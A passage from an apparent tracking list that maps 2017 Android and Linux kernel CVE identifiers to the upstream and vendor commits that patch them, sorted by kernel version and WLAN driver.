https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=dfb170e243a3082a668f77ec0190af2c2bed9161 -CVE-2017-0457 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=7d87c5cf051c49c7b3bdb8abe4051b0aef41c87d - Link - 3.18 - https://github.com/android/kernel_msm/commit/f6e21d2a3778bcbbef7320ffbf31631d76679175 -CVE-2017-0458 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=eba46cb98431ba1d7a6bd859f26f6ad03f1bf4d4 -CVE-2017-0459 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?h=rel/msm-3.18&id=ffacf6e2dc41b6063c3564791ed7a2f903e7e3b7 -CVE-2017-0460 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=93dd37c412dbadff9d5b1b6f7b317713192cab2b - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=8e2e23126709ebffa1bd91e1a6ac77e16714d852 - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=85cccedb0cae0331228cc58fa91d31810018df98 -CVE-2017-0461 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=ce5d6f84420a2e6ca6aad6b866992970dd313a65 -CVE-2017-0462 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=eb7b1426279e751b1fc3e86f434dc349945c1ae7 - Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=9a71e9a686942ae3c491061ab275a3678ee2819a -CVE-2017-0463 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=955bd7e7ac097bdffbadafab90e5378038fefeb2 - Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=32c229060ca33b816c50eedc136ea2800f9974df -CVE-2017-0464 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=051597a4fe19fd1292fb7ea2e627d12d1fd2934f -CVE-2017-0465 - Link - 
https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=3823f0f8d0bbbbd675a42a54691f4051b3c7e544 -CVE-2017-0507 - Link - https://github.com/aosp-mirror/kernel_msm/commit/03c26a1d8c8687131da151c2e4bd5a04d08e0dec -CVE-2017-0509 - Link - https://github.com/android/kernel_msm/commit/9c5e11d70f209553d023ea2b79efe7b2bf85fd5e -CVE-2017-0510 - Link - 3.4 - https://review.lineageos.org/#/c/179097 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=d4dfd82835bb6f92de3bfb8a1cbf6beaf892ad08 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=7a4fd6fb0df85d16db29561e0063b41a62f11e4d -CVE-2017-0516 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=0dba52cf7955306c71fb76d16437d848c953e462 -CVE-2017-0518 - Link - 3.18 - https://github.com/android/kernel_msm/commit/015d1d5dc8c42d6ab92a31b99cd9f089fae1d27e - Link - 3.18 - https://github.com/android/kernel_msm/commit/a064a44e03158dbf655a866ba21f5d1baa2dee9e -CVE-2017-0519 - Link - 3.18 - https://github.com/android/kernel_msm/commit/2f264730e26a73da973c6eef0e1ee252294ec740 -CVE-2017-0520 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=eb2aad752c43f57e88ab9b0c3c5ee7b976ee31dd -CVE-2017-0521 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=dbe4f26f200db10deaf38676b96d8738afcc10c8 - Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=77c4aba67d89ba4055b7c9bd417f49593cba497b -CVE-2017-0523 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=5bb646471da76d3d5cd02cf3da7a03ce6e3cb582 - Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=2c7b4349b858398caf0ae146e87554c3502d20a5 -CVE-2017-0524 - Link - https://github.com/android/kernel_msm/commit/e1fb1600fc222337989e3084d68df929882deae5 - Link - https://github.com/android/kernel_msm/commit/0ab30d91fb178c5967753343029581983a4e9b67 - Link - 
https://github.com/android/kernel_msm/commit/e6430a4da1fb0212a546379eadbe986f629c3ae9 -CVE-2017-0525 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=58a0d46820909166c89286bdbffbae3358daf778 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=a6a6e4993aca80b7cddab8752f7d8636eb45a8c5 - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=7452cc75cbd363107a1e5d4c5f1327d3edc797ef -CVE-2017-0531 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=530f3a0fd837ed105eddaf99810bc13d97dc4302 - Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=d342da7d820af9c7c0b0b8049adb53beb713e0f0 -CVE-2017-0533 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=e3af5e89426f1c8d4e703d415eff5435b925649f -CVE-2017-0534 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=e3af5e89426f1c8d4e703d415eff5435b925649f -CVE-2017-0535 - Link - https://android.googlesource.com/kernel/tegra/+/fb2e6cf549dcbdcc10f9c3115ba5123bdd5a307e -CVE-2017-0536 - Link - https://github.com/android/kernel_msm/commit/e6430a4da1fb0212a546379eadbe986f629c3ae9 -CVE-2017-0537 - Link - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=389b185cb2f17fff994dbdf8d4bac003d4b2b6b3 -CVE-2017-0564 - Link - https://github.com/aosp-mirror/kernel_msm/commit/941a80cf3340804e488c6ee2742e7a771bd01272 -CVE-2017-0568 - Depends - Link - https://github.com/android/kernel_msm/commit/b7fb46c77af4623291f53a5453df733b8fb1fe18 - Link - https://github.com/android/kernel_msm/commit/a3f3e7ed54aaa4f5f6929f1ed460363fdc8964d6 -CVE-2017-0569 - Link - 3.10 - https://github.com/android/kernel_msm/commit/b7fb46c77af4623291f53a5453df733b8fb1fe18 -CVE-2017-0570 - Link - 3.10 - https://github.com/android/kernel_msm/commit/b7fb46c77af4623291f53a5453df733b8fb1fe18 -CVE-2017-0571 - Link - 3.10 - 
https://github.com/android/kernel_msm/commit/4b29d0111186ebef75a9af7da8257697386ac4a4 -CVE-2017-0572 - Link - https://github.com/android/kernel_msm/commit/3afb019c44d750086f8d5228f8c934da2910d8df -CVE-2017-0573 - Link - https://github.com/android/kernel_msm/commit/3d9f2799fd13d1125ab4b3d74a523bd7f2e566f3 -CVE-2017-0574 - Link - https://github.com/android/kernel_msm/commit/e55ddf68568a33288d76f5e00c93f8157cb9a632 -CVE-2017-0575 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=a4f790c140d9813c3af66a9b367b4568e053278a -CVE-2017-0576 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=2b09507d78b25637df6879cd2ee2031b208b3532 -CVE-2017-0583 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=b8f70068650a6e6bef0a41de2e30c17087d3a84d - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=452d2ad331d20b19e8a0768c4b6e7fe1b65abe8f -CVE-2017-0584 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=b83b9057d56c057d1dfca79ae197583a83766245 -CVE-2017-0586 - Link - https://github.com/android/kernel_msm/commit/05bacdc0f9c16c58326a4be9e88afa870cf1024e -CVE-2017-0604 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=6975e2dd5f37de965093ba3a8a08635a77a960f7 -CVE-2017-0606 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=d3237316314c3d6f75a58192971f66e3822cd250 -CVE-2017-0607 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=b003c8d5407773d3aa28a48c9841e4c124da453d -CVE-2017-0608 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=167a094eac4383809dd703d96fb88c406dd8786b - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=b66f442dd97c781e873e8f7b248e197f86fd2980 -CVE-2017-0609 - Link - 
https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=38a83df036084c00e8c5a4599c8ee7880b4ee567 -CVE-2017-0610 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=65009746a6e649779f73d665934561ea983892fe - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=2bf336ed7ff29768b63fcf0d9528dd129f516643 -CVE-2017-0611 - Link - 3.4 - https://review.lineageos.org/#/c/179797/ - Link - 3.10 - https://review.lineageos.org/#/c/171424/ - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=1aa5df9246557a98181f03e98530ffd509b954c8 -CVE-2017-0612 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=05efafc998dc86c3b75af9803ca71255ddd7a8eb -CVE-2017-0613 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=b108c651cae9913da1ab163cb4e5f7f2db87b747 -CVE-2017-0614 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=fc2ae27eb9721a0ce050c2062734fec545cda604 -CVE-2017-0619 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.14/commit/?id=72f67b29a9c5e6e8d3c34751600c749c5f5e13e1 -CVE-2017-0620 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=01b2c9a5d728ff6f2f1f28a5d4e927aaeabf56ed -CVE-2017-0621 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=9656e2c2b3523af20502bf1e933e35a397f5e82f -CVE-2017-0622 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=40efa25345003a96db34effbd23ed39530b3ac10 - Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=2881d2bbc26ff321fd9e717ad6f968aebd277d22 -CVE-2017-0624 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=0ac5f6f2f221efb93fc0ddb1fec6487c76d95acd -CVE-2017-0626 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=64551bccab9b5b933757f6256b58f9ca0544f004 -CVE-2017-0627 - Link - 
https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=fcca203d8e6aa0ef22fa41d72a06dea393d6d148 -CVE-2017-0628 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=012e37bf91490c5b59ba2ab68a4d214b632b613f -CVE-2017-0629 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=012e37bf91490c5b59ba2ab68a4d214b632b613f -CVE-2017-0630 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/28fb06421ab3d9256d32611138306470996cc4c1 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/45e5a5e1b85f23843b90f3cddcfc26fa862ff80c -CVE-2017-0631 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=8236d6ebc7e26361ca7078cbeba01509f10941d8 -CVE-2017-0632 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=970d6933e53c1f7ca8c8b67f49147b18505c3b8f -CVE-2017-0633 - Link - https://github.com/android/kernel_msm/commit/4e38c573e81eb76f09bae425f035be392fbab370 -CVE-2017-0648 - Link - https://android.googlesource.com/kernel/tegra/+/34597d088801ad8060b45026df2435f52136032f -CVE-2017-0650 - Link - https://github.com/android/kernel_msm/commit/c6d874fd2c515406bc33ab78d60df70a47bddae2 -CVE-2017-0651 - Link - https://android.googlesource.com/kernel/tegra/+/c555ed3d0a8133c30731f25263b44d878844e277 -CVE-2017-0705 - Link - https://github.com/android/kernel_msm/commit/e58dd312d3d28331b2e28674c6a49f815a55d4bc -CVE-2017-0706 - Link - https://android.googlesource.com/kernel/msm/+/6a469209ac014b6d93f373e042500f6e8cd6a04a -CVE-2017-0710 - Link - https://android.googlesource.com/kernel/msm/+/f37e859ab4c55c6c56e3c157bbed3024fc8d0dc6 -CVE-2017-0740 - Link - https://github.com/android/kernel_msm/commit/e7fdc1ca00f1e589df8542af7e7acaaa87370625 -CVE-2017-0744 - Link - https://android.googlesource.com/kernel/tegra/+/8054a1fe453e8114bbb56c424e1ea80639bb6b54 -CVE-2017-0746 - Link - https://github.com/android/kernel_msm/commit/a793531b751d8c3609e2bf1a5dc2c0f10e003632 -CVE-2017-0747 - Link - 
https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=c0021edb9ee6b2a37322cd6cf6ebdf160d09b8d7 -CVE-2017-0748 - Link - https://github.com/android/kernel_msm/commit/43ff88a8336310e665941dea6ffec77cc8314706 -CVE-2017-0749 - Link - https://android.googlesource.com/kernel/mediatek/+/7116d306da66de0de21e982024b4d3a3056f4461 -CVE-2017-0750 - Link - https://github.com/android/kernel_msm/commit/3f0531e5775303091a1ff975cdd572cc6a935321 -CVE-2017-0751 - Link - https://github.com/android/kernel_msm/commit/ee4aa31b9f24c28064e509e22c1f9013df768f5f -CVE-2017-0786 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=68acc6ab1474e9dde68880a7856e8a74ff86aa19 -CVE-2017-0787 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=08ccf853c567bf02f4a5c9f9aef19a40ecdf57d1 -CVE-2017-0788 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=08ccf853c567bf02f4a5c9f9aef19a40ecdf57d1 -CVE-2017-0789 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=58168423faa39f5062047eb1d16d294902f0f48b -CVE-2017-0790 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=5575ff40a53a954ec942ff0c17b193433e72c132 -CVE-2017-0791 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=2935fde98001eca0f8dafad827933ce60d44ffba -CVE-2017-0792 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=f35ce58f516c15c022745d687bb1c59ffab63293 -CVE-2017-0794 - Link - https://github.com/aosp-mirror/kernel_msm/commit/47b3a105cc4cec0d912345d27d9743b97691b21c -CVE-2017-0824 - Link - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=3d6c7b39db34369e28b0581be26f57e9467f8408 -CVE-2017-0825 - Link - https://github.com/android/kernel_msm/commit/83366dd9ddb9337450f704ceef750a06c69df9ff -CVE-2017-0861 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/93533f313a1bf465ff8c33032e91b88315dcf9bf -CVE-2017-0862 - Link - 3.10 - 
https://github.com/aosp-mirror/kernel_msm/commit/19384322b5b51987bd6037f7a6b18a62a5d4d654 -CVE-2017-0866 - Link - 3.18 - https://android.googlesource.com/kernel/tegra/+/40286163f84a29993c2f552a237256541875a1b4 -CVE-2017-1000251 - Link - 3.0 - https://review.lineageos.org/#/c/189602/ - Link - 3.4 - https://review.lineageos.org/#/c/189415/ - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e860d2c904d1a9f38a24eb44c9f34b8f915a6ea3 -CVE-2017-1000364 - Depends - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=640c7dfdc7c723143b1ce42f5569ec8565cbbde7 - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=a7d519473a32267e52f1f92141240451e5403dd3 - Link - 3.4 - https://review.lineageos.org/#/c/179545/ - Link - 3.4 - https://review.lineageos.org/#/c/179546/ - Link - 3.10 - https://review.lineageos.org/#/c/178806/ - Link - 3.10 - https://review.lineageos.org/#/c/178807/ - Link - 3.10 - https://review.lineageos.org/#/c/178808/ - Link - 3.18 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.18.59&id=d4712eb79b17d85c9e354efa2d3156ce50736128 - Link - 3.18 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit?h=linux-3.18.y&id=c6aeba66df8743478d7b9f64fa76d88ed4100c67 - Link - 3.18 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit?h=linux-3.18.y&id=509f8f1772ec2972898771ecc376572b6efd184a -CVE-2017-1000365 - Link - 3.10 - https://review.lineageos.org/#/c/179178/1 - Link - 3.18 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.18.59&id=2dff2164d171e9c27f2f7fa778d408ecf4d1e1ea -CVE-2017-1000380 - Link - ^4.11 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ba3021b2c79b2fa9114f92790a99deb27a65b728 - Link - ^4.11 - 
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d11662f4f798b50d8c8743f433842c3e40fe3378 -CVE-2017-10661 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=1e38da300e1e395a15048b0af1e5305bd91402f6 -CVE-2017-10662 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=b9dd46188edc2f0d1f37328637860bb65a771124 -CVE-2017-10663 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/2b97ce290c589827e21838c70c9c5601b663037a - Link - 3.18 - https://git.kernel.org/pub/scm/linux/kernel/git/jaegeuk/f2fs-stable.git/commit/?h=linux-3.18.y&id=deaeed5b8acdd10c388616bbc57416cf3db213ff -CVE-2017-10996 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9f261e5dfe101bbe35043822a89bffa78e080b3b -CVE-2017-10997 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=fae242db5e1943ba878b4fb215fe6e7f1c387a20 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=a395a070880acc679e3832b21d96504edbbe4af2 -CVE-2017-10998 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=9ffb3cdd7279b011a509267caa4a5119fd6346c0 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=208e72e59c8411e75d4118b48648a5b7d42b1682 -CVE-2017-10999 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=f51a152ad52108457ae6b1caf7a04857f25c4bed -CVE-2017-11000 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=af787fdedeb62964efaf9e969ad17e3b6c232082 -CVE-2017-11001 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=d5d2c9baff89932e822ceae74b1569af07d55f19 -CVE-2017-11002 - Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=64c0865bb0c5a642ba420967b23e0f66e035b300 - Link - 
https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=825eeb85d4866e362452b18df929a54a7c6111f6 -CVE-2017-11012 - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=7d0e40d328fa092c36b9585516ed29fc6041be55 -CVE-2017-11013 - Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=64297e4caffdf6b1a90807bbdb65a66b43582228 - Link - qcacld-2.0 - https://android.googlesource.com/kernel/msm/+/bb3c16f2e001eef9dcdd73e8c6ed6331e5fdd86b - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=c9f8654b11a1e693022ad7f163b3bc477fea8ce8 -CVE-2017-11014 - Link - qcacld-2.0 - https://github.com/aosp-mirror/kernel_msm/commit/adb96af5b080dfe4ee29961a17ed3f04c87d5519 - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=ec58bc99e29d89f8e164954999ef8a45cec21754 -CVE-2017-11015 - Link - prima - https://github.com/LineageOS/lge-kernel-mako/commit/ac39bfffe109a6cffcaf3b537505130712161dce - Link - prima - https://github.com/LineageOS/lge-kernel-mako/commit/d0cd3ede7c17ee7fcf0f9b6d125d027bc28640be - Link - qcacld-2.0 - https://github.com/aosp-mirror/kernel_msm/commit/d7285900f6fa28b0be51f5d18c52bd06385f8aee - Link - qcacld-2.0 - https://github.com/aosp-mirror/kernel_msm/commit/a50ca3ce494ab6bb6b2e37cdd0428aa6d6260bef - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=ec58bc99e29d89f8e164954999ef8a45cec21754 - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=1ef6add65a36de6c4da788f776de2b5b5c528d8e -CVE-2017-11018 - Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=1d718286c4c482502a2c4356cebef28aef2fb01f -CVE-2017-11022 - Link - qcacld-2.0 - 
https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=1379bfb6c09ee2ad5969db45c27fb675602b4ed0 - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=f41e3dbc92d448d3d56cae5517e41a4bafafdf3f -CVE-2017-11023 - Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/17ef83c708be034454df7914ef5484c36515eece - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=c36e61af0f770125d0061a8d988d0987cc8d116a -CVE-2017-11024 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=f2a482422fefadfa0fa9b4146fc0e2b46ac04922 -CVE-2017-11025 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=95e72ae9281b77abc3ed0cc6a33c17b989241efa -CVE-2017-11028 - Depends - Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/a96e06fac09e182b5211f20dd6311f93a5d056af - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=fd70b655d901e626403f132b65fc03d993f0a09b - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=6724296d3f3b2821b83219768c1b9e971e380a9f -CVE-2017-11029 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/e13a16c079cf8f5c758f5c31fbd72edca2656e54 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=74ab23917b82769644a3299da47b58e080aa63f2 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=86f0d207d478e1681f6711b46766cfb3c6a30fb5 -CVE-2017-11032 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=2720294757d0ad5294283c15dc837852f7b2329a -CVE-2017-11035 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=cc1896424ae7a346090f601bc69c6ca51d9c3e04 - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=c5060da3e741577578d66dfadb7922d853da6156 
-CVE-2017-11040 - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=7a4d0eea0ca0c8a72111ae58d9829be817f102c9 -CVE-2017-11046 - Link - https://github.com/android/kernel_msm/commit/5ff192e2c758298680b0c6cd364a55c59850901f -CVE-2017-11048 - Link - https://github.com/android/kernel_msm/commit/a42f6e19316e9e5aaaf8bd2c3bec25fde136dcaa -CVE-2017-11050 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=725674586f5bc009ef5175d29eb0fd677e0ef1f2 -CVE-2017-11051 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=c8f263f0e3b0b6cba38fae9b2330d77f802c51d8 -CVE-2017-11052 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=c1ea8487f35d3f4dea574552afda6a1637f98bbb -CVE-2017-11053 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=99c00329bc13c526305dc826950c2cc117e6725d -CVE-2017-11054 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=4d9812973e8b12700afd8c3d6f36a94506ffb6fc -CVE-2017-11055 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=708633ca627031373f5cc3ca2e8994e7d694905a -CVE-2017-11056 - Link - https://github.com/android/kernel_msm/commit/d5481967f73c5448b9b2ae528a75faa0b040bc42 -CVE-2017-11057 - Link - https://github.com/android/kernel_msm/commit/270bb9351889878dbfc87a6797886cb3caf42430 -CVE-2017-11058 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=4d9812973e8b12700afd8c3d6f36a94506ffb6fc -CVE-2017-11059 - Link - https://github.com/android/kernel_msm/commit/be632ce97422dfe533944186e2f4420b87b87ad5 -CVE-2017-11060 - Link - qcacld-2.0 - 
https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=657bb41463b837b2681e1fed310bd97970b09b83 -CVE-2017-11061 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=e08628a3cfe039bc4bdd7fc66f5ec7a59a97b404 -CVE-2017-11062 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=954bdf216ce56a860092fd9549229b036e08c97b -CVE-2017-11064 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=38d6f16b8583bae6a1881c744ae08d609c99cb7e -CVE-2017-11067 - Link - https://github.com/aosp-mirror/kernel_msm/commit/3fabdcba3a09ce8f3cc757bf6240e53421a1e363 -CVE-2017-11073 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/120d28bad9890eca3a6451a83a7c71cb650dfef7 -CVE-2017-11085 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/dc8f7a19762df2c84678482b60f6b807b919eb44 -CVE-2017-11089 - Link - https://android.googlesource.com/kernel/msm/+/a30bdf229ab1efd96e500c43aabbff20e223128a -CVE-2017-11090 - Link - https://android.googlesource.com/kernel/msm/+/98f7c17df33355e78417e6bb2395f810a903bb64 -CVE-2017-11091 - Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/10b0cb47e92abe52c5372ded0fe80a5a5f18586f -CVE-2017-11092 - Link - https://android.googlesource.com/kernel/msm/+/d78717de292b114f388e900e3e7947ae44630982 -CVE-2017-11093 - Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/072d53b2ca00ac57ca4e0ebe2315b431256cf786 -CVE-2017-11600 - Link - 3.10 - https://github.com/aosp-mirror/kernel_common/commit/0af5440977299a17a0f226ce00d872572a426c14 - Link - 3.10 - https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec.git/commit/?id=7bab09631c2a303f87a7eb7e3d69e888673b9b7e -CVE-2017-12146 - Link - 3.16+ - 
